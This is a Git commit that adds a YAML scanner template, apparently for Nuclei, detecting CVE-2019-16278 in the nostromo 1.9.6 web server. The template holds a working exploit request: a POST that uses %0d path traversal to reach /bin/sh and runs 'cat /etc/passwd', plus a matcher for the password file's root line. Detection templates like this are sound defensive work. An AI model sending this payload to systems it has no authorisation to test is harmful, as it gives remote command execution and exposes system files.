Create CVE-2019-16278.yaml

patch-1
PikPikcU 2020-09-01 15:59:30 +00:00 committed by GitHub
parent b1f2a9ebe8
commit 4d4343cc54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

27
cves/CVE-2019-16278.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2019-16278
info:
author: "pikpikcu"
name: "nostromo 1.9.6 - Remote Code Execution"
severity: Critical
#Source: https://www.exploit-db.com/raw/47837
requests:
- raw:
- |
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Content-Length: 1
Connection: close
echo
echo
cat /etc/passwd 2>&1
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"